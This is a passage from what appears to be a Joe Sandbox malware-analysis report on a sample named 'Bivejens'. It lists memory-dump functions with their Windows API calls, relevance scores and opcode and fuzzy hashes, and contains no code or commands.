Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 21B39776
GetCurrentThread.KERNEL32 ref: 21B397B3
GetCurrentProcess.KERNEL32 ref: 21B397F0
GetCurrentThreadId.KERNEL32 ref: 21B39849

Memory Dump Source

Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: fb444d8b686f4d2c159b943c69e29f5186aa7de460d4fa90ca74bd984fa210d9
Instruction ID: 7e7bceb7b6e0d4f44e1eea4149cc25097446cb942248d18d1ec267f5b822ea59
Opcode Fuzzy Hash: fb444d8b686f4d2c159b943c69e29f5186aa7de460d4fa90ca74bd984fa210d9
Instruction Fuzzy Hash: E45146B1900349CFEB18CFA9D5847EEBBF1EF8D300F208519E819A7260C7745944CB66

Function 21B396F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 21B39776
GetCurrentThread.KERNEL32 ref: 21B397B3
GetCurrentProcess.KERNEL32 ref: 21B397F0
GetCurrentThreadId.KERNEL32 ref: 21B39849

Memory Dump Source

Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 14d7bf2ad6943bd54be21bac9c5b83ecf4bd23c539a6fad40e9d09096fe84ebb
Instruction ID: 8e74fbacaea9e22af2fc184431716c0969d5572069425cd15648a8509d3c24a8
Opcode Fuzzy Hash: 14d7bf2ad6943bd54be21bac9c5b83ecf4bd23c539a6fad40e9d09096fe84ebb
Instruction Fuzzy Hash: 935135B1900349CFDB18CFAAD584BEEBBF1EF8D310F208119E819A7260D7746940CB65

Function 21C21844 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 21C243A2

Memory Dump Source

Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e691c8702398bc73690f277372a21e7e1288b0c82226ee259173cd5f71740
Instruction ID: 35477ee1770a2e0298f21bd6dbe4642da7297f4f6b72970af5e47146e682a4b3
Opcode Fuzzy Hash: 251e691c8702398bc73690f277372a21e7e1288b0c82226ee259173cd5f71740
Instruction Fuzzy Hash: 5751BEB5D00349DFDB14CF9AC884ADEBBB5FF49710F64812AE818AB210D775A885CF90

Function 21C24284 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 21C243A2

Memory Dump Source

Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ae1eed825b913518b82ea0e9481f965f7a26849bb5c2fc1ccebc9189f093c191
Instruction ID: c89e86c58303857f51a15e6cbf3ad76cb90741a3e06ca69cedd96672c88e1952
Opcode Fuzzy Hash: ae1eed825b913518b82ea0e9481f965f7a26849bb5c2fc1ccebc9189f093c191
Instruction Fuzzy Hash: E251C0B5D00348DFDB14CF9AC980ADEBBB5BF48310F64812AE818AB210D774A885CF90

Function 21B39938 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21B399C7

Memory Dump Source

Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ee507076c35ac6ab4f5bfaa605e7c237bc40ba9f094eafe637438f0e772f22f8
Instruction ID: b0bb369ec0cd64397e751c5bab4be4801c5437a4cb33e987713f8923c01c225e
Opcode Fuzzy Hash: ee507076c35ac6ab4f5bfaa605e7c237bc40ba9f094eafe637438f0e772f22f8
Instruction Fuzzy Hash: F021E4B5900249DFDB10CFAAD580AEEBBF5EB48310F24841AE958A7310D379A954CFA0

Function 21B39940 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 21B399C7

Memory Dump Source

Source File: 00000005.00000002.2617941470.0000000021B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 21B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7d5e9f571358425cc5c745572cad040cd023c7b3902dd93d2ea639388c991f3a
Instruction ID: a69f5a90e184a5cd59076d3c1ea409d78f09ecfead667f2d0432e8951ccea2fa
Opcode Fuzzy Hash: 7d5e9f571358425cc5c745572cad040cd023c7b3902dd93d2ea639388c991f3a
Instruction Fuzzy Hash: 7621C4B59003499FDB10CFAAD984ADEBBF8EB48310F14841AE954A7310D374A954CFA5

Function 21C26A12 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 21C26A91

Memory Dump Source

Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 32d7be9a8f2d657a9893e23bb6c014b1f5433a45e10e318ae00ea85246fe7a0d
Instruction ID: 83b769d153fe67d58eaa46ceee7e987ef87c2bc5a0f5497e73d852fc53050759
Opcode Fuzzy Hash: 32d7be9a8f2d657a9893e23bb6c014b1f5433a45e10e318ae00ea85246fe7a0d
Instruction Fuzzy Hash: EB215EB9900715CFDB14DF86C885B9BBBF5FB48314F24C549E5595B321C374A841CBA0

Function 21C28F10 Relevance: 1.5, APIs: 1, Instructions: 45
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32 ref: 21C28F6D

Memory Dump Source

Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 072cc6b5d35709354d968938ccb07ec26482c547d4b4c4ea47240e43e14bf194
Instruction ID: e9d4a6a6db420d56140fff5263526a7068b5a9e182efa764088e51f9b1769d59
Opcode Fuzzy Hash: 072cc6b5d35709354d968938ccb07ec26482c547d4b4c4ea47240e43e14bf194
Instruction Fuzzy Hash: 071115B5D00359CFDB20CF9AD444BDEBBF4EB48320F24855AD558A7610C374A984CFA5

Function 21C28F18 Relevance: 1.5, APIs: 1, Instructions: 43
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32 ref: 21C28F6D

Memory Dump Source

Source File: 00000005.00000002.2618025889.0000000021C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 21C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21c20000_Bivejens.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3748178a0bafc909d6d8901ed0ed2ef64cafd01d55817c1bcbbdae0c15bb2d75
Instruction ID: 497915c1aa6cec19a2e6cb39944b140e6a3dc28682e791627a7e1641f5a13956
Opcode Fuzzy Hash: 3748178a0bafc909d6d8901ed0ed2ef64cafd01d55817c1bcbbdae0c15bb2d75
Instruction Fuzzy Hash: 581123B5904348CFDB20DF9AD444BDEFBF4EB48320F248419D558A7210C378A940CFA5

Function 0015E010 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ebd7f45052b5bcb9dbd65db2949be582c97bc4b81d04704d920533d5554207
Instruction ID: aec60ab5482f0bfd90470c0c914dd199376cff5b3624659565c4698bb0115662
Opcode Fuzzy Hash: 38ebd7f45052b5bcb9dbd65db2949be582c97bc4b81d04704d920533d5554207
Instruction Fuzzy Hash: D3129835065646CFA2502B70EDAC12BBBF1FB1F32B754ACA8F10FC58659B7144C9CA62

Function 0015E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14215f76f5346c70d9872bd48c08ee0dcf9e629ef291af00c0f81f55ec272b47
Instruction ID: 8909c500c138ddf4859031f3ba1414a1ba2f36e2b5c274442133b93d126127f9
Opcode Fuzzy Hash: 14215f76f5346c70d9872bd48c08ee0dcf9e629ef291af00c0f81f55ec272b47
Instruction Fuzzy Hash: 25129835065646CFA2502B70EDAC12BBBF1FB1F32B754ACA8F10FC58659B7144C9CA62

Function 00150CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95325267feb398b0daa4531f685b262515c68de82eae83c9c14f843bbd805eb
Instruction ID: bfa46eca2376eaf2c3b506573d6312b5d51dc528acc4069d0d0f20d37f294130
Opcode Fuzzy Hash: c95325267feb398b0daa4531f685b262515c68de82eae83c9c14f843bbd805eb
Instruction Fuzzy Hash: D952D274900229CFDB54DF24DD95B89BBB6BB49311F1081E9D88EA7361DB312E85CF90

Function 0015791D Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8de690d15c49dfb901dfacbeae84b11eb3ab1ea5584bb4b324403e272eac6ea
Instruction ID: 3b6bf5548de2fc23f1cab9b160e95462274938602b1870afaeb881a68ba7474d
Opcode Fuzzy Hash: a8de690d15c49dfb901dfacbeae84b11eb3ab1ea5584bb4b324403e272eac6ea
Instruction Fuzzy Hash: 1AE17E30A04209CFCB15CF68E885AADBBF1FF49315F158599E8699F2A1C731ED85CB90

Function 001560A0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36cbd32bce0f6a57ea999866d30803265e100bb73e21457699f34e344b32ec46
Instruction ID: a12ab38a733419296a25953268a3ec28c400b3238d54ee05d3157eb239a52124
Opcode Fuzzy Hash: 36cbd32bce0f6a57ea999866d30803265e100bb73e21457699f34e344b32ec46
Instruction Fuzzy Hash: 2561C030704210CFDB189B75889473A7AA6AFC8352F544569E866CF3A2DF74CC8AD7D1

Function 001540F1 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698011a878ac2b1b5aea72d4984353b83249e56ee0abed842e488260901e0c1b
Instruction ID: 49257554007f7ba0765a9a15a96fb4cb339413772276c2cf724f975ce6385ef5
Opcode Fuzzy Hash: 698011a878ac2b1b5aea72d4984353b83249e56ee0abed842e488260901e0c1b
Instruction Fuzzy Hash: C4818C74E04248CFCB05DFB9D8949DDBBB2FF89311B2480A9D819AB361DB359846CF51

Function 001564E0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ebadb8710a73fec509bb609e4afbd0988a34c3895c3885e19d69e871739bd52
Instruction ID: 5eb680b060c774e3213094caa07164f1aee408e8ed6f1a915151a6b1da7eaf84
Opcode Fuzzy Hash: 2ebadb8710a73fec509bb609e4afbd0988a34c3895c3885e19d69e871739bd52
Instruction Fuzzy Hash: E9719074A00505CFCB58CF68C4849A9BBB2BF89302BA58169D825EF365DB31EC49CF91

Function 001580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65de480b73f191b5a6624cc395705c70a352c7375770ce12435304b16a0e31b0
Instruction ID: 3de99f5e4d2a88b14b777688785d65df4d802a5c5ac90f8618c653624b03499c
Opcode Fuzzy Hash: 65de480b73f191b5a6624cc395705c70a352c7375770ce12435304b16a0e31b0
Instruction Fuzzy Hash: AA71F534700A05CFCB15DF68C884A6A7BE6AF99342F1540A9E826EF371DB70DC86CB50

Function 219AD700 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9996cc27d3f8d81d1b66e1eee8a61ef4aa6a46e261af69fff243df65a743c0
Instruction ID: 1bd75f6209bd17bc749b2866b50fc7e501e379c71c05eb44cf23b0f949407ca8
Opcode Fuzzy Hash: 7a9996cc27d3f8d81d1b66e1eee8a61ef4aa6a46e261af69fff243df65a743c0
Instruction Fuzzy Hash: 11819D74E412688FDB65DF69C991BDDBBB2BB89300F1080EAD85DA7250DB315E81CF44

Function 219A73E0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ce635b58849e326afd32073033c283fb0e9c024f7afe0e6a9f81a97da507802
Instruction ID: ee13dc5fb33f885e7e9eabd3f80efbdb5a431c893254c660b4fd38795557217a
Opcode Fuzzy Hash: 0ce635b58849e326afd32073033c283fb0e9c024f7afe0e6a9f81a97da507802
Instruction Fuzzy Hash: 8A71C174E00218CFEB18DFA5C991B9DBBB2FF89300F648129D819AB355DB369946CF50

Function 219AD410 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bae9faf50ec83a35744a14f1c990ffa6476536c519b02de9105e52d13762813
Instruction ID: 1f1d3489e665735c71cfaf91805905149fabecf3bad8f39860bb6c446536afba
Opcode Fuzzy Hash: 6bae9faf50ec83a35744a14f1c990ffa6476536c519b02de9105e52d13762813
Instruction Fuzzy Hash: BF71C174E00218CFEB14DFA9C990ADDBBF2BF89300F648129D809AB355DB369946CF50

Function 219B21B8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25e4428c974a8cd74060c611cf3c20cc7724619a0101c0269ba151ac31c1265
Instruction ID: ee78bfa93bfab145a74dffe032de59e57756f5d773768b8ccd4eb111c453ce67
Opcode Fuzzy Hash: d25e4428c974a8cd74060c611cf3c20cc7724619a0101c0269ba151ac31c1265
Instruction Fuzzy Hash: 2F71A174E00218CFEB14DFA5C991ADDBBB2FF89300F648129D819AB355DB356A42DF50

Function 219B81E8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77defa751c64e60e407f69aedfec183ee4dfb908b127530a3cb6b2f769c4941d
Instruction ID: 9fdddb1546cd68d46a4da85859bb50c1a2ef3e79a51f9d36488da588c6494c97
Opcode Fuzzy Hash: 77defa751c64e60e407f69aedfec183ee4dfb908b127530a3cb6b2f769c4941d
Instruction Fuzzy Hash: 4371B274E00218CFEB14DFA5C991AEDBBB2BF89300F648129D419BB355DB355A42CF54

Function 00155F5C Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d25a85db69cc410ab9908ba4d1e643661070a5401f66decdbb7866462b3267
Instruction ID: 5fbffc789d49d4b5c4a26b3f33fa55f1655137c8a2984bbb92cb5ee2013b055c
Opcode Fuzzy Hash: c8d25a85db69cc410ab9908ba4d1e643661070a5401f66decdbb7866462b3267
Instruction Fuzzy Hash: 7F51AC31308211DFDB159F24D894BBE3BB2BB88302F54456AE85A8F291DB75CC4ADB91

Function 219AEA10 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4eb63044eceafa495442b6e40eb220d30a5abce4d0025db3ecdcfc4b65aac2
Instruction ID: e20aa2b9e4e9f089c50c7b29294dfd97cb17452b8ec087cf5ceaa152a304911e
Opcode Fuzzy Hash: ba4eb63044eceafa495442b6e40eb220d30a5abce4d0025db3ecdcfc4b65aac2
Instruction Fuzzy Hash: 1951B434B001158FCB04DF79C59896E7BFABF88711B2181A9E54ADB361DB34DD058BA0

Function 219AEE3A Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec231529114b99af4536d9f0492a619d7649f590d113ca29acad030df618a4c
Instruction ID: 1a49592fd33fb9f6c93e338e7c0bd028e725a198c28aafd8339f0158758abced
Opcode Fuzzy Hash: 0ec231529114b99af4536d9f0492a619d7649f590d113ca29acad030df618a4c
Instruction Fuzzy Hash: 59619E74E012289FEB65DF69CC91BDDBBB2AB89300F1081E9D51CA7250EB315E85CF40

Function 0015D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c368cb390b73052f7f1e807e5f8bdc4514de3c6eee53f2b3d210867695dc44
Instruction ID: 54d220d2a04f408e73a97e385f5b1606c33bdfdf18159584e3e222e0d94c6421
Opcode Fuzzy Hash: b4c368cb390b73052f7f1e807e5f8bdc4514de3c6eee53f2b3d210867695dc44
Instruction Fuzzy Hash: 46517074E01208DFDB54DFA9D9949DDBBF2BF89300F24816AE819AB365DB31A905CF10

Function 001541A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfef6afa3b64638024bbb480b83fe114c386ef4578ba5a60aa7bb62f48d35cbf
Instruction ID: ad8cb05d98cedf04ca3d051da870595304b9f4fc7b083e685fe6a6a52bd25444
Opcode Fuzzy Hash: dfef6afa3b64638024bbb480b83fe114c386ef4578ba5a60aa7bb62f48d35cbf
Instruction Fuzzy Hash: 1F51B374E01218CFCB48DFA9D48499DBBF6FF89311B208169E819AB324DB35AC55CF50

Function 0015A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99703c96e5a75188f7c8ea93a5c4aaa1a30f946a7703dafabe5377c2b6ae3881
Instruction ID: 1b80b5f71a0e5ebc992f90bafbe758554c0a2d47b0bc81e2261f03f55748edf5
Opcode Fuzzy Hash: 99703c96e5a75188f7c8ea93a5c4aaa1a30f946a7703dafabe5377c2b6ae3881
Instruction Fuzzy Hash: B341DD31A44248CFCF11CFA4C848AADBFB2BF49316F048255E9659F2A1D370ED58CB62

Function 219AFB37 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd475729d17361177d72d2bfb577e3e87da8a06eaf0181d62299ec3f0f70b241
Instruction ID: 843a6513520fba12d1cccc044099de6fa44d828e0d9b0f11c71cfba9c24fd8c7
Opcode Fuzzy Hash: cd475729d17361177d72d2bfb577e3e87da8a06eaf0181d62299ec3f0f70b241
Instruction Fuzzy Hash: E6410074E04218CFDB00DFA5D894BEDBBF2BB89310F10806AD819A7390EB355A4ACF50

Function 219AFB48 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d95d5cc5bd44f253dac1b1eb40e7d7d62e418861d6d1978d4102b5f45a08733
Instruction ID: 89579a6982aa718b5fa30c791b6ec4d0f3443875545ede3a190799b03fafe48f
Opcode Fuzzy Hash: 1d95d5cc5bd44f253dac1b1eb40e7d7d62e418861d6d1978d4102b5f45a08733
Instruction Fuzzy Hash: F441D174D00218CFDB44DFA5C994BEDBBF2BB49304F10806AD819A7294EB355A46CF50

Function 0015AA98 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4beca0dc309ae6f5bb60db9faf462a70afecfddff1371de66468c11c32e64d6e
Instruction ID: afd09452ff06a399acf904bb8c688ef8aea1821791d10695581830e0dea8e3b1
Opcode Fuzzy Hash: 4beca0dc309ae6f5bb60db9faf462a70afecfddff1371de66468c11c32e64d6e
Instruction Fuzzy Hash: 62414870640219CFCB15CF28C898A6A7BB6BF48312F510169E915DB3B0CB71DD94CB92

Function 00158EF8 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c76fc2b2ca372acd86db3c456f9700d6ae84c9ce07ccf223759a17f0a3adefb
Instruction ID: b55b3941695d59feaf88142a14cb49570efb82ec524ab50750359a34d4a7e373
Opcode Fuzzy Hash: 4c76fc2b2ca372acd86db3c456f9700d6ae84c9ce07ccf223759a17f0a3adefb
Instruction Fuzzy Hash: 1931C930304251CFDB298B79D85063E7777BF89312B25049BE866EF2A2DF64CC888755

Function 00159C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4043396736a7281956d6dc104ef376ecd5d3b3eb75630fde7910cfa2f434c1e
Instruction ID: 5aac2c0ec1cc5e20178a7effbbd2bface5e82d87c36c99775fafd5966e856ab8
Opcode Fuzzy Hash: d4043396736a7281956d6dc104ef376ecd5d3b3eb75630fde7910cfa2f434c1e
Instruction Fuzzy Hash: 46417E30600245CFDB00CF68C844B6A7BF6EF89312F558466E928CF265D775DC45CBA2

Function 00155658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844726a0610b428e2a251fd55ec6b1537e28ab80b84ac704aa7f237f15c7dd57
Instruction ID: 489d4d4622e85a4202834739620acdb06bcab2ddc942b7d2b203f27dbd089276
Opcode Fuzzy Hash: 844726a0610b428e2a251fd55ec6b1537e28ab80b84ac704aa7f237f15c7dd57
Instruction Fuzzy Hash: A231A331204149DFCF059F64D9A4AAE3BB7EF88311F608028FD199B255CB35DEA5DBA0

Function 219A73D0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b914b56881723bceb4a9c5e92f116ddc773b65c191fd66efac07fa7d9cd5c855
Instruction ID: c6bbc011446a54266e9ad50bd15bc85b629f062a95e86da7b6a0e870e6130b29
Opcode Fuzzy Hash: b914b56881723bceb4a9c5e92f116ddc773b65c191fd66efac07fa7d9cd5c855
Instruction Fuzzy Hash: E031F674D002188FDB08DFAAD951AEEBBF2AF89300F24C12AD418BB254DB355946CF50

Function 219A70AF Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039004ebdf0b148d97c5b4328bba1355f487ea9ed5fdfba8a7a3437e59994a34
